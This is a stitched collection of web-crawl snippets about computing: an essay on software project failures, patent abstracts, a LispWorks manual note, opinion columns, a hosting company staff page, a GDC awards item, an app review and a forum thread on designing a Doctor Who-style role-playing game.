If there's a theme that runs through the tortured history of bad software, it's a failure to confront reality. On numerous occasions, the U.S. Department of Justice's inspector general, an outside panel of experts, and others told the head of the FBI that the VCF system was impossible as defined, and yet the project continued anyway. The same attitudes existed among those responsible for the travel reservation system, the London Stock Exchange's Taurus system, and the FAA's air-traffic-control project--all indicative of organizational cultures driven by fear and arrogance.
A recent report by the National Audit Office in the UK found numerous cases of government IT projects' being recommended not to go forward yet continuing anyway. The UK even has a government department charged with preventing IT failures, but as the report noted, more than half of the agencies the department oversees routinely ignore its advice. I call this type of behavior irrational project escalation--the inability to stop a project even after it's obvious that the likelihood of success is rapidly approaching zero. Sadly, such behavior is in no way unique.
In the final analysis , big software failures tend to resemble the worst conceivable airplane crash, where the pilot was inexperienced but exceedingly rash, flew into an ice storm in an untested aircraft, and worked for an airline that gave lip service to safety while cutting back on training and maintenance. If you read the investigator's report afterward, you'd be shaking your head and asking, "Wasn't such a crash inevitable?"
So, too, the reasons that software projects fail are well known and have been amply documented in countless articles, reports, and books [see sidebar, To Probe Further]. And yet, failures, near-failures, and plain old bad software continue to plague us, while practices known to avert mistakes are shunned. It would appear that getting quality software on time and within budget is not an urgent priority at most organizations.
It didn't seem to be at Oxford Health Plans Inc., in Trumbull, Conn., in 1997. The company's automated billing system was vital to its bottom line, and yet senior managers there were more interested in expanding Oxford's business than in ensuring that its billing system could meet its current needs [see box, "Case Study #1"]. Even as problems arose, such as invoices' being sent out months late, managers paid little attention. When the billing system effectively collapsed, the company lost tens of millions of dollars, and its stock dropped from $68 to $26 per share in one day, wiping out $3.4 billion in corporate value. Shareholders brought lawsuits, and several government agencies investigated the company, which was eventually fined $3 million for regulatory violations.
Even organizations that get burned by bad software experiences seem unable or unwilling to learn from their mistakes. In a 2000 report, the U.S. Defense Science Board, an advisory body to the Department of Defense, noted that various studies commissioned by the DOD had made 134 recommendations for improving its software development, but only 21 of those recommendations had been acted on. The other 113 were still valid, the board noted, but were being ignored, even as the DOD complained about the poor state of defense software development!
Some organizations do care about software quality, as the experience of the software development firm Praxis High Integrity Systems, in Bath, England, proves. Praxis demands that its customers be committed to the project, not only financially, but as active participants in the IT system's creation. The company also spends a tremendous amount of time understanding and defining the customer's requirements, and it challenges customers to explain what they want and why. Before a single line of code is written, both the customer and Praxis agree on what is desired, what is feasible, and what risks are involved, given the available resources.
After that, Praxis applies a rigorous development approach that limits the number of errors. One of the great advantages of this model is that it filters out the many would-be clients unwilling to accept the responsibility of articulating their IT requirements and spending the time and money to implement them properly. [See "The Exterminators," in this issue.]
Some level of software failure will always be with us. Indeed, we need true failures--as opposed to avoidable blunders--to keep making technical and economic progress. But too many of the failures that occur today are avoidable. And as our society comes to rely on IT systems that are ever larger, more integrated, and more expensive, the cost of failure may become disastrously high.
Even now, it's possible to take bets on where the next great software debacle will occur. One of my leading candidates is the IT systems that will result from the U.S. government's American Health Information Community, a public-private collaboration that seeks to define data standards for electronic medical records. The idea is that once standards are defined, IT systems will be built to let medical professionals across the country enter patient records digitally, giving doctors, hospitals, insurers, and other health-care specialists instant access to a patient's complete medical history. Health-care experts believe such a system of systems will improve patient care, cut costs by an estimated $78 billion per year, and reduce medical errors, saving tens of thousands of lives.
But this approach is a mere pipe dream if software practices and failure rates remain as they are today. Even by the most optimistic estimates, to create an electronic medical record system will require 10 years of effort, $320 billion in development costs, and $20 billion per year in operating expenses--assuming that there are no failures, overruns, schedule slips, security issues, or shoddy software. This is hardly a realistic scenario, especially because most IT experts consider the medical community to be the least computer-savvy of all professional enterprises.
Patients and taxpayers will ultimately pay the price for the development, or the failure, of boondoggles like this. Given today's IT practices, failure is a distinct possibility, and it would be a loss of unprecedented magnitude. But then, countries throughout the world are contemplating or already at work on many initiatives of similar size and impact--in aviation, national security, and the military, among other arenas.
Like electricity, water, transportation, and other critical parts of our infrastructure, IT is fast becoming intrinsic to our daily existence. In a few decades, a large-scale IT failure will become more than just an expensive inconvenience: it will put our way of life at risk. In the absence of the kind of industrywide changes that will mitigate software failures, how much of our future are we willing to gamble on these enormously costly and complex systems?
We already know how to do software well. It may finally be time to act on what we know.
Robert N. Charette is president of ITABHI Corp., a risk-management consultancy in Spotsylvania, Va. An IEEE member, he is the author of several books on risk management and chair of the ISO/IEEE committee revising the 16085 standard on software and systems engineering risk management.
Bitcoin Mints New Words
The digital currency is at the center of linguistic, as well as financial, innovation25 Nov
Google Tries to Keep Patents Out of the Hands of Trolls
Internet giant buys 28% of the patents offered during its patent-purchase experiment28 Oct
Artificial Intelligence Outperforms Human Data Scientists
Software that has proven itself as capable as many human data scientists could speed up the Big Data revolution20 Oct
Computer Count of Huge Crowds Now Possible
Automated crowd-counting software can reduce the time needed from up to a week to just half an hour19 Oct
Qualcomm’s Scene-Detecting Smartphone System Is Almost Here
Engineers explain Qualcomm’s SceneDetect ahead of the release of the smartphone processor that runs it13 Oct
Hajj Pilgrimage Safety Challenges Crowd Simulator Technology
The world's most crowded public space could use smart design, technology, and crowd management to prevent disasters, says expert26 Sep
Navy Diversifies Ships' Cyber Systems to Foil Hackers
A new cyber defense strategy aims to protect the most vulnerable Navy ship systems against hackers23 Sep
The Fuzzy Logic of Fleeing for Your Life
Computer models are becoming more attuned to human fear during crowd evacuations18 Sep
Twitter's Tips for Making Software Engineers More Efficient
Why every engineer shouldn't necessarily work directly on the product, and why good tools are like good food16 Sep
Computer Scientists Find Bias in Algorithms
Learning algorithms may have a mind of their own21 Aug
The Secret of Airbnb’s Pricing Algorithm
The sharing economy needs machine intelligence to set prices20 Aug
FBI Wants Better Automated Image Analysis for Tattoos
It’s a tougher problem than facial recognition19 Aug
Beyond Just “Big” Data
We need new words to describe the coming wave of machine-generated information28 Jul
The Application Builder – Revolutionizing the Simulation Industry
This video is brought to you by our partners23 Jul
How to Compute With Data You Can’t See
Web applications could increase security by keeping data encrypted even during computations23 Jul
The 2015 Top Ten Programming Languages
New languages enter the scene, and big data makes its mark20 Jul
Interactive: The Top Programming Languages 2015
Biggest Neural Network Ever Pushes AI Deep Learning
Digital Reasoning has trained a record-breaking artificial intelligence neural network that is 14 times larger than Google's previous record8 Jul
IBM Watson's Recent Acquisitions Might Make It a Knowledge Machine You Can Actually Use
Big Blue recently picked up a search engine, a Siri-like digital assistant, and an API that can understand text and images29 May
How Computer Modelers Took On the Ebola Outbreak
Did real-time epidemic modeling save lives in West Africa?28 May | 计算机 |
2015-48/3654/en_head.json.gz/11983 | A technique and mechanism for efficiently searching across multiple versions of a resource is provided. New operators are provided that take into account the versions of a particular resource. The query engine evaluates the new operators using either an index-based approach or a functional approach. Under an index-based implementation, a hierarchical index is traversed to find a particular resource (or resources) associated with a specified path and the version history identifier associated with the particular resource(s). A version history table containing references to all versions of the particular resource(s) are then obtained. Under the functional implementation, a link table, which contains all paths in a user's workspace, is examined to determine whether the version history identifier of a particular resource matches a version history identifier of a resource specified in the link table and whether the path to the resource in the link table is related to the path specified. | 计算机 |
2015-48/3654/en_head.json.gz/12172 | 25.3.2 Editing source code
While the Stepper is running, it displays a read-only copy of the source in the source area. Therefore, you cannot edit the code in the source area, other than when the status is "Enter a form to step in the pane above.".
If you step a function for which the source has been edited since it was compiled, then the Stepper uses a copy of the compile-time source, not the edited source. This copy is stepped in a new editor buffer created specially for it and this is displayed in the source area.
Common LispWorks User Guide (Windows version) - 5 Jul 2006 | 计算机 |
2015-48/3654/en_head.json.gz/12381 | Another Crock, Headed Your Way
Software rental over the Internet, and why it'll never work.
During the dot-com boom, a lot of crackpot ideas appeared on the scene, including the notion that the Internet would be the conduit for software applications. Users would rent software on an as-needed basis rather than buying shrink-wrapped packages or expensive licenses for elaborate systems. This idea was as crazy when it was first proposed as it is today, but it continues to gain momentumat least among idealists who see it as a path to profits.
Microsoft is the surprise player: a company that once put the "service-based" model for software distribution on its enemy list. What changed? I believe that the entire concept is part of the groupthink mentality that plagues Microsoft and results in a tremendous waste of resources and misplaced focus.
Show me the money. Here are some of the problems with the software rental model. First of all, at the base of the model, you need to have a report, a spreadsheet, or an indication that this concept of software distribution will result in more profits than the shrink-wrapped model. Otherwise, what's the point? At the same time, you must provide some evidence that people will prefer the new model to the old. And finally, you need a valid argument to convince corporate America that the new model will somehow save people time and money.
All three of these elements have to be in play and workable for software rental to get traction. Unfortunately, either software companies will have to realize less revenue using the rental-services model or corporate America will have to be bamboozled into embracing the idea and lose money on the deal. There is no way of getting around the dilemma. In this column, I'm not even going to bother discussing the viability of using the too often flaky Internet to deliver such services.
And note that the second requirement, which is that people can be cajoled into liking the basic idea, is also problematic. I mean, once I own a copy of Microsoft Office, does the company expect me to rent another? What about the huge installed base of users who have already paid the full-ticket price for the product?
Proof that this is going nowhere. Recently IBM, Microsoft, Oracle, SAP, and a host of other companies launched a new standards group called the Web Services Interoperability Organization (WS-I, www.ws-i.org). Oddly, there are hardware companies in this group, including Fujitsu, Hewlett-Packard, and Intel. The idea is to have a lot of meetings and create open standards for software-service schemes.
You always know that something is amiss when consortiums such as this form. It means there is no clear leader to tell people what to do. The clear-leader phenomenon is more common when a high-tech paradigm shift actually takes place. This Web-service stuff is purely wishful thinking, which is how what amounts to a drinking club forms, in hopes that something good comes of it. Nobody knows what the heck is really going on.
This group reminds me in some strange way of another drinking club, the Sun-inspired Liberty Alliance Project (www.projectliberty.org), which, curiously, has a lot of crossover ("we go both ways") companies such as Hewlett-Packard. Whether Microsoft .NET or Sun ONE, these ideas are making everybody scratch their heads. Some may nod knowingly, but in fact, there is no "there" there. Companies join the drinking clubs just in case, in fear that they may miss out. The drinking club itself becomes news and feeds the momentum, showing that there is hot activity, and golly, look at all those big names!
A lot of hot air. The giveaway that the Web-based distribution model is nothing but hot air with limited momentum and hardly any energy is the laundry list of drinking-club members. The Liberty Alliance is the best example of celebrity bloat. Look at its membership list: Global Crossing (ha!), Bell Canada, United Airlines, American Express, Sony, and NTT DoCoMo. What do these guys have to do with anything? This list of participants (née founders!) reads like one of those strategic-partners press releases that used to be so popular a decade ago. It's a "let's see which of our buddies we can line up to convince the rubes that we are up to something important" list. But it's not fooling anyone.
Face it, the Web services model is a throwback to the dot-com era and has nothing going for it. Waste your time on it at your own risk. You've been warned.
Discuss this article in the forum
Blues at Hannover
Odd Sights at Hannover | 计算机 |
2015-48/3674/en_head.json.gz/10193 | Once the operating system is installed on the hard drive, reboot into the Bios and turn AHCI on. Among other effects, this allows the boot mechanism to find Sata drives beyond the IDE range of 0-3. EFiX can now act as a boot selector, allowing you to boot between, say, Windows, Linux and Mac OS X, provided each is installed on a separate physical drive.
The EFiX boot screen. It's found five drives: the left-most is Linux-bootable, then two Apple-bootable. The next is unbootable and the fifth is a Windows-bootable drive. The current boot (selected with the cursor keys) is the central highlighted icon, and the small rectangles above it represent the countdown.
I probably need to correct any impression that EFI is open-ended and wholly wonderful. An alternative view is set out here, where it's argued that EFI is effectively a DRM'd Bios.
ASEM itself takes advantage of the fact that "a core value of EFI is the preservation of intellectual property", and appears to be near-paranoid that its development effort will be stolen by others, making full use of EFI's support for cryptography to obscure its code and prevent interception of its updates.
Would-be hackers are not the only losers here. Ordinary EFiX users have complained that the one-way, over-the-net update process offers no option to step back to a previous update if, as actually happened earlier this year, an EFiX firmware update negatively impacts (in this case, network) performance.
But is it Legal?
There's plenty of room for discussion here. ASEM maintains that it's using an open standard, has developed its proprietary extension software in-house and is in breach of no copyright or patents. It sees the EFiX as broadening Apple's market, helping sales of Leopard into the built-it-yourself gaming sector, hitherto almost exclusively the domain of Windows.
Success: Retail Leopard installing
However, a clause in Leopard's End User Licence Agreement (EULA), which everyone installing Leopard is supposed to read and accept, says: "This Licence allows you to install, use and run one (1) copy of the Apple Software on a single Apple-labeled computer at a time. You agree not to install, use or run the Apple Software on any non-Apple-labeled computer, or to enable others to do so." | 计算机 |
2015-48/3674/en_head.json.gz/10838 | Utilities WolframAlpha: The Answer To All Your Questions
Nathan Simpson on November 30th 2012
math, Mathematica, statistics, Stephen Wolfram
Since being released in 2009, Wolfram Alpha has become very popular over the years. Based on the computational platform Mathematica, written by British scientist Stephen Wolfram in 1988, WolframAlpha is capable of interpreting and answering basic questions such as, “How old was FDR in 1942?” and “What is the distance between the north pole and the south pole?”
A service like this is already accessible to iPad users via the website, however, the app provides a much simpler and more convinient approach to solving all your problems. With the price drop putting it from $50 to $2, do we have a bargain on our hands?
The WolframAlpha System
WolframAlpha delivers fact and aims to inform. Vague questions such as, “Was Michael Jordan present in the NBA Playoffs this year?” and “Which shirt will I wear today?” result in a failed interpretation, and you’ll get a different answer or usually none at all to your question.
Another thing about the search engine is that questions have to be phrased correctly in order for them to be interpreted as such. My earlier example question asked “What is the distance between the north pole and the south pole?” but the important thing is that it’s written so that it’s very clear to see the meaning. Try the same question phrased as “What is the distance between the north and the south pole?” and you will have no relevant response. The difference is almost negligible when writing, but it’s crucial you phrase questions correctly if you want the answer to be so, too.
The questions you input don’t really have to be questions at all; you can strip away connectives and little details so that our earlier question is reduced to this: “distance north pole south pole,” and the answer will be correct. As long as the fundamentals of the question are there, the interpretation and therefore the answer will be the right one.
The app employs a semi-minimalist approach in the way that it’s designed. It only has a single main screen predominantly taken up by the search bar and results from your search to the right. On the left is a useful array of features that includes your search history, favorite searches, about the app/company and even example searches to start you off.
The display upon startup
Stephen Wolfram’s Mathematica has the underlying principle that any simple input can produce complex results, much like single-celled organisms eventually developed into the intricate and perplexing life that surrounds and encompasses us today. This principle is clearly evident in WolframAlpha. Some of the example searches show off WolframAlpha’s diversity and power as a search engine, from simple inputs like a birthday or a name, to the most complex of mathematical equations, this app is unparalleled in terms of sheer information.
Fourier transformations at work.
Example searches are categorized into different fields, like Culture and Media, Colors and Transportation. Each offers an inside into the vast wealth of knowledge the app has at its disposal. I’ve found the search engine to be invaluable when researching topics for a report or just to look up meaningless facts and statistics merely for amusement.
There’s a wealth of example searches in the categories to the left.
Search History can also be a useful function when required, as you may have forgotten previous entries where the results could be of use at the time. It’s not the best function in the world, but useful nonetheless. Equally of use is the Favorites function. Tap the Share button in the top right of the display, click Add to Favorites and your search will display in the corresponding tab on the left.
The Greek letter ‘Xi’
One of the highlights of this app for me is the custom keyboard. Characters previously available through the 123 button are displayed on an annex of the standard keyboard along with other keys that can be of use whilst performing searches. Even if there’s a character you’ve never seen before, input it by itself into the search engine and you will get to know what it’s for.
Why Not Just Use the Website?
The thing is, you can. It works soundly in Safari and is free of charge. What I’ve found though is that the app is a lot more organized; you don’t have to jump from screen to screen to get categories and results because all the content is on that single home page. It certainly is a lot more convenient.
The app is designed for the iPad, so it would make sense that the app is far easier to use than the website. It looks better, too; while it’s not the most amazing UI in the world, it fits perfectly with the theme of other default apps and is semi-minimalistic in the way it’s designed.
The most attractive reason to use the app over the website in my opinion is the custom keyboard. It’s extremely convenient to have all the mathematical and Greek symbols available when performing complex calculations that would otherwise be impossible, whereas doing this on the website requires for me a lengthy process of copying and pasting from other websites. This is a concept I think other apps should adopt as well due to the enhancement of the user experience.
Overall, you can see that the app has lots of things going for it, but none that warrant a $50 price tag, as WolframAlpha has clearly made note. With the new, far more reasonable price of $3.99, the app becomes a cheap and easy to use outlet for your mind to wander and explore the mysteries of life. It’s definitely worth a purchase if you use the search engine at all.
A cheap way to access all the perks of the WolframAlpha search engine in a stylish and organized manner.
WolframAlpha | $3.99 | WolframAlpha
Reviewed by Nathan Simpson on
Related PostsQuick Math+ Improves Your Mental MathCalculate Faster with TydligCalca: The Most Powerful Calculation App for iPadmem:o – The Easy Way To Visualize Everyday Data | 计算机 |
2015-48/3674/en_head.json.gz/11526 | FaceBook Twitter Google+ YouTube LinkedIn عربي
Request a Password Reset
Domains Registration
About Dimofinf
Open a Ticket
White Friday
Open a Ticket Dimofinf management
Dimofinf has the best management team that contributes to the development of the company and raising its performance to provide better service to our clients and to keep up with technological advancements that improve our Arab hosting services, servers, content management programs and web development.
Mohammad Alkhayat Founder and GM
Mohammad Alkhayat is the founder of Dimofinf and was the first to introduce programming and design services in 1998 when he founded Dimofinf. He has developed several unique software programs and applications for many major websites. He also enjoys a significant experience in the field of management and a wide-ranging technical expertise in programming (using several programming languages), different web applications and server environments of different technologies. He manages the company’s general and major policies and strategic plans, he also gives directions with regards to how to accomplish these plans.
Youssef Nosshy Operations Office Manager
Youssef Nosshy has been working in the IT field since 2006 and he has a significant technical experience in this field. He joined our team in the beginning of 2011. He first served as an employee in the technical support division then became its head then he held the position of Vice Executive Director for Technical Affairs and in 2013 he became the Business Development Manager ,finally in 2015 he became Operations Office Manager .
Ramy Allam CTO
Mr. Allam has joined Dimofinf in 2010. He first served as an employee in our hosting division then as a vice head for the same division until then becoming its head and finally chief technical officer. Since 2005, he has been involved in operating systems management, open-source software applications and web-development. He works according to a set of clear objectives and standards established to guarantee the best possible performance and service to clients subscribed in our different hosting packages. His responsibilities include the continuous development and improvement of the hosting division and supervising its daily operations ensuring the outcome is always up to our high standards and our clients’ expectations.
Mustafa Albazy Head of Hosting
Mustafa Albazy from the United Kingdom is specialized in operating systems and information security with a lot of community research and development into this fields. Mustafa joined Dimofinf early 2008 as a hosting technical support and since then he has been promoted to different positions within the company, the last of which was his current position as Head of Hosting Department. Mustafa is responisble of providing the highest web hosting quality, from the hardware/software base to customer service and uptime results.
Madeleine Essam HR Manager
Madeleine joined Dimofinf in the beginning of 2013. She holds the position of the Human Resources and Administrative Affairs manager and she enjoys a vast experience within those fields. Madeleine is responsible for providing employees for all department, following up on work schedules, policies and leaves as well as addressing all company needs.
Joseph Botros Customer Service Manager
Joseph Botros joined Dimofinf in the second half of 2012 as a customer service employee. After some time, he was promoted to Team Leader. By the end of 2013, he was responsible for the department as he was promoted to the position of Customer Service Manager. Joseph possesses wide experience in the customer service field, in addition to, his technical skills with regards to dealing with all content management programs as well as his excellent marketing vision, which allows him to always be up-to-date with the clients' technical requirements and constantly provide service in the best manner.
Mahran Elneel Programming Department Manager
Mahran started working at Dimofinf in 2012 as a PHP programmer on the programming team. his technical skills developed during the time he worked at Dimofinf with regards to several languages like PHP, XML, JS and CSS. This experience helped him develop the infrastructure for Dimofinf program and fulfilling clients' needs. Mahran became the Programming Department Manager in 2014 and is managing the programming team according to Dimofinf clients' and with an aim of completely meeting their needs and demands.
Hadeel Barakat Projects Manager
A web geek , graduated from the Faculty of Engineering, Computers and Systems Department then started her career as a web developer. She joined Dimofinf in the second half of 2013. Hadeel is innovative , creative , challenge taker and has dedication towards work , she also has good awareness of different web technologies and her skills enabled her to compete in the market .
Ahmed Fahmy Digital Marketing Manager
Ahmed Fahmi joined Dimofinf in 2014 and since then, he has supported the company marketing department and restructured it on strong scientific bases until he formed a strong, inclusive team to build a strong infrastructure and several successful marketing plans to reinforce the company trademark and make it a stronger competitor internationally through well-studied plans and methods, in addition to, the latest advancements in the field of electronic marketing and compatibility with search engines as well as targeting new clients and starting to set a future marketing plan to work on and execute with the help of his team so that Dimofinf would always be in the lead.
Backup Service
Authorized Distributor | 计算机 |
2015-48/3674/en_head.json.gz/11629 | « GDC 2014 adds talks about The Last Of Us, Broken Age and more |
| GDC 2014 Indie Games Summit features Molyneux, Vollmer and more »
Anita Sarkeesian, Riot co-founders win GDCA 2014 Special Awards The 14th Annual Game Developers Choice Awards organizers have revealed its two final Special Award winners for this year. The Ambassador Award, honoring someone who is helping video games "advance to a better place" through advocacy or action, is going to media critic Anita Sarkeesian, creator of Feminist Frequency, a video series that deconstructs representations of women in game and pop culture narratives. The Pioneer Award, honoring a breakthrough tech and gameplay design milestone, will go to Brandon Beck and Marc Merrill, the co-founders of Riot Games.
Ambassador Award winner Sarkeesian, whose honor was bestowed after open nominations from the game development community and voting by the Game Developers Choice Advisory Committee, has explored the representation of women in pop culture, with a particular focus on representation within the medium of video games. In her work Anita Sarkeesian has deconstructed the stereotypes, patterns and tropes associated with women in popular culture, and highlighted issues surrounding the targeted harassment of women in online and gaming spaces. In doing so, Sarkeesian has herself been subjected to harsh reactions ranging from epithets to misogynistic threats of violence. This online harassment did nothing to stifle the success of her Kickstarter campaign to fund the creation of the "Tropes vs. Women in Video Games" online video series, which quickly reached -- then exceeded -- its funding goal. Pioneer Award winners Brandon Beck and Marc Merrill are the minds behind League of Legends, a game that is played by more than 27 million players every day and by more than 67 million players every month. The duo created Riot Games with the mission to be the most player-focused company in the world, and the Pioneer award is built upon the Staples Center-sized growth of eSports by the company. Riot's community outreach and support initiatives have earned League of Legends a remarkable level of commitment from players, who regularly spend more than a billion hours a month in the game as of March 2013. As President of Riot Games, Merrill has led development, publishing, and live operations on League of Legends, while Beck drives Riot's strategy and creative vision as CEO. Finally, as part of the awards evening that includes both the Independent Games Festival and Game Developers Choice Awards, the team behind the Hey Ash Whatcha Playin'? video series, Ashley and Anthony Burch, will contribute brand-new videos to the Independent Games Festival this year. They augment the efforts of ceremony favorites, the video game sketch anarchists Mega64, who are returning to make videos for the Game Developers Choice Awards this year. The Game Developers Choice Awards are produced in association with GDC. The awards ceremony will take place on Wednesday, March 19, 2014 at 6:30 pm at the San Francisco Moscone Center and is open to all GDC attendees. As previously announced, the Game Developers Choice Awards ceremony will be hosted by Respawn Entertainment's community manager, Abbie Heppe, also the voice of Sarah in Respawn's upcoming Titanfall, and will be immediately preceded by the Independent Games Festival Awards hosted by Capy president and co-founder Nathan Vella. More information about the 14th Annual Game Developers Choice Awards can be found on the official website.
Gamasutra and GDC are sibling organizations under parent UBM Tech
Posted by Staff on February 11, 2014 9:00 AM | Permalink | 计算机 |
2015-48/3674/en_head.json.gz/11666 | An input device for interfacing with a computing device is provided. The input device includes a body configured to be held within a human hand. The input device includes a light emitting diode (LED) affixed to the body and a power supply for the LED. A mode change activator is integrated into the body, where the mode change activator is configured to cause a change of a color of a light originating from the LED. The color change is capable of being detected to cause a mode change at the computing device. Methods for detecting input commands from an input source within a field of sight of an image capture device, and a computing system which includes the input device are provided. | 计算机 |
2015-48/3674/en_head.json.gz/11726 | The Forge Forums General Forge Forums Last Chance Game Chef (Moderators: Mike Holmes, Jonathan Walton) Untitled DrWho Project
Topic: Untitled DrWho Project (Read 2439 times)
Dan Maruschak
Untitled DrWho Project
My four threads are:[Kissanil] Answers to Power 19Character Creation placementChrono Master?[BSU] "Blowing Stuff Up" - Basic DraftI was already leaning towards something Doctor Who-related once I saw the ingredients Doctor and Chrono Master?. In the [Kissanil] thread, there's this quote: It�s about strong dilemas like �If I could drain the sun�s energy to save my lover�s soul, should I do it?� That could easily be the theme of a Doctor Who story. And of course there's plenty of mimicry going on in the show: from the obvious, like the TARDIS's chameleon circuit, to the way that the sci-fi elements of the stories will often mimic folklore or history (e.g. aliens that have similarities to vampires, alien cultures that mimic medieval europe). I'm a fan of the show (in both the classic and modern incarnations -- I'm most drawn to the Tom Baker era, which was my first exposure, and I feel like the Matt Smith episodes have been a return to "proper" Doctor Who where there's a sense of fun and whimsy mixed in with the sci-fi and adventure). I've been thinking that I should try my hand at creating a good Doctor Who game since I was disappointed by the recent officially licensed Cubicle 7 product (it's basically the traditional "skill rolls vs. GM-set target numbers" chassis with a layer of "only fail when you want to" points poured over it), and it seems like this Game Chef is my opportunity to do that. Since I don't have an official license, I'm going to do a "serial numbers filed off" game. I think this also potentially introduces a fun creative constraint into play (I was never interested in Harry Potter gaming until my imagination was sparked by the "Harry Potter with the serial numbers filed off" game Boarsdraft -- the "similar, but different" effect got my creative juices flowing). Since I'm trying to avoid direct references to the source material I haven't settled on a good title yet (plus I'm pretty bad with titles in general). I'm probably inclined to make story structure pretty heavily involved in the mechanics -- I don't want to just slap Doctor Who color on something generic, I want to figure out what makes Doctor Who stories special to me and figure out how to get that to happen in a game. That may be too ambitious for a Game Chef game, but I need to follow the idea that's getting me excited (I explored a few alternative ingredient combinations but I didn't feel the fire in my belly to attack them like I do this one). Most Doctor Who stories are generally structured like mysteries where a lot of the story involves just uncovering what's going on, so I'll need to figure out how to wrap the game around that. The concept of "plot as background detail" is something I've been thinking about since I playtested Boarsdraft, so I may try to develop some of my thoughts on that concept in this game, but I'm not sure yet since I haven't figured out what the foreground (i.e. what the players mechanically interact with) would be if I embrace that metaphor.
my blog | my podcast | My game Final Hour of a Storied Age needs playtesters!
mrteapot
Re: Untitled DrWho Project
"Plot as background detail" is a very Doctor Who sort of thing. Lots of Doctor Who stories have this sort of thing going on where they have utterly rejected traditional ideas of what makes a good story. They'll not explain things until the moment that they are relevant rather than foreshadowing it. Or when there is foreshadowing, it is very heavy handed and weird and probably pointing at stuff that won't happen for several more episodes. The stories are mysteries, but not really fair ones. You couldn't really solve the mysteries with the clues provided. These and other aspects are problems according to traditional ideas of a good story, but Doctor Who keeps being engaging because of (not despite) these things.Which all makes for great RPG fodder. All of those things are true of lots of roleplaying game plots, too, especially those made up on the fly. It suggests that the players should be doing something else and "solving the problem" could be done at any time given enough technobabble, provided the players already sorted out the emotional core of the story or whatever the players are doing.It took a fairly large amount of self-control to not make a Doctor who knockoff game for me as well. I already wrote my Doctor Who knockoff last year.
Matthew Sullivan-Barrett
Right on, Dan, I'm glad someone is stepping up to the plate. It had to be done, man, and I'm super excited to see how it comes out.I always like the Psych 101 episodes, where it's all just a thin metaphor for the human experience, which I recall seeing a lot of in the Tenant era.Alons-y!
PeterBB
This game sounds relevant to my interests!I completely agree that "plot as background detail" is true, but I would be careful not to lose the "exploring a fascinating universe" element. The monsters aren't the core of the stories, but they are definitely part of the draw anyway.
Troy_Costisick
I love mystery games, Dan. Dr. Who is a classic, so I hipe it goes well for you. I'll just plug one of my favorite games real fast: Inspectres. It is Ghostbusters with the serial numbers filed off. Maybe that can provide some inspiration.Peace,Troy
Theory Blog: http://socratesrpg.blogspot.com/Community Site: http://www.rpgcrossroads.com/
Quote from: Troy_Costisick on April 10, 2012, 04:37:40 AMI'll just plug one of my favorite games real fast: Inspectres. It is Ghostbusters with the serial numbers filed off. Maybe that can provide some inspiration.If I were making the game, this would be my starting point as well. But I'm interested in seeing what Dan comes up with.
My current plan is to have the GM prep several things. First, they'll prep the "mystery", which is going to be something along the lines of "what does it look like on the surface?" (e.g. vampires), "what's the sci-fi twist?" (e.g. aliens that need to consume the iron from vertebrate blood), and "what's the crisis?" (e.g. aliens begin conquest of earth). Second, they'll prep a bunch of colorful details about the setting and about the people and aliens involved. Scene-framing will be mostly a player choice, but there will be some procedure during the GM prep that puts a list of elements onto a player-facing list, and player's will get some sort of in-game benefit for framing scenes that include that element. The GM's job will be to introduce elements of the mystery and elements of their colorful prep (since not everything the GM introduces will be "plot significant", players won't feel obligated to latch onto every detail the GM throws at them), and the things on the player-facing list will be places or situations that will facilitate the GM doing that job (so the player-facing list might have something like "the theater", and when the player frames a scene at the theater it will make it organic for the GM to introduce the colorful "theater manager" NPC he's created, or the Chinese magician character that's an element of the mystery).I think play will be broken down into a few phases that have slightly different mechanics. Right now I'm thinking three phases, the beginning, middle, and end. The boundary between the beginning and the middle is the "The True Mystery is Revealed" step (e.g. it's not vampires, it's blood-drinking aliens!) and the boundary between the middle and the end is "The Threat is Revealed" step (e.g. we need to stop them before they open a space-bridge to their homeworld and begin their invasion!). In the first two phases players won't be mechanically interacting with the mystery, but doing something else like building relationships or something (this is the part that's still fuzziest for me), risking horror, injury, or danger to the people they know. In the end phase they'll be able to do something directly in the mechanics to avert the crisis. The GM will be limited in what kind of fiction they can introduce. So, for example, in one phase they might be able to do violence to characters off-screen, but they may only be allowed to threaten a befriended character on-screen where a PC has an opportunity to avert it (like I said, this part is still gelling).I've never played InSpectres, but I'm familiar with it. I think I want to go in more of a GM-prepped "mystery" direction (of the "not fair" type, where basically the story isn't about a character/audience deducing clues, but about following characters as a situation is slowly revealed) rather than an on-the-fly approach. The play of the game won't really be "will they figure it out?", but more about what happens to the characters along the way: are they filled with wonder, horrified, alienated, enlightened, etc.? My main mechanical touchpoint is the playtest I did of Boarsdraft a while back. There were some things I thought were interesting in that game and some places where I thought it needed work. Unfortunately the designer of that game isn't going to take it in the direction I think it needs to go, so I'm trying to go in that direction myself with this game. It's part of my larger area of interest in the idea of having strongly structured plots as a platform for exploring characters, as opposed to the more common Forge-derived approach of having strongly defined characters which ram into each other to produce emergent plot.
So what would make this game the kind of game you only play once?
The "last chance" theme isn't strongly represented in the design (yet?), although my goal is for each session to map to a single story (i.e. one episode of the modern format, or a 4- or 6-episode arc in the classic half-hour-with-cliffhangers format) and character creation will be very light-weight so it should be playable as a one-shot.
I'm still struggling with a character system. One of the ideas I'm trying to incorporate into the game comes from some of the commentary tracks I've listened to. I forget who said it, but the idea was that people tend to overstate the differences in characterization between different regenerations of The Doctor, and that most of the actors could play "their" Doctor even with a script written for a different regeneration. The most obvious place to see this on-screen is in The Five Doctors, where Peter Davidson does all of the Gallifrey political stuff that was originally supposed to be for Tom Baker. Different regenerations emphasize different aspects of The Doctor, but it's rarely a completely new personality. Sure, Colin Baker's Doctor is notably arrogant, but they're all arrogant in their own ways. I'm not sure how I want to translate that into play yet.Right now I'm leaning toward something like Poison'd, where a character will roll one of their stats against another one of their stats to determine their result, so something like: When The Chronomaster tries to convince someone to do things his way, roll Kindness vs. Arrogance.
I've finished a first draft of the game, tentatively called Getting There in Time. Here's the PDF: Getting There in Time rev0.1. I still want to finish a sample adventure for the supplemental materials, and I'm also a few hundred words over the limit so I'm going to work on some more edits to try to trim some fat. I'd appreciate feedback! My biggest question is: is the game playable, i.e. do you understand what I want you to do from reading the rules? Are there things I'm asking you to do that seem like they'd be unreasonably difficult? Are there pieces missing? My second biggest question is: does it feel like a Doctor Who game?
I finished the tweaks I was planning. Here's the draft I plan to submit for the contest: Getting There in Time rev 0.2. | 计算机 |
2015-48/3674/en_head.json.gz/12581 | Office of Technology Evaluation (OTE)
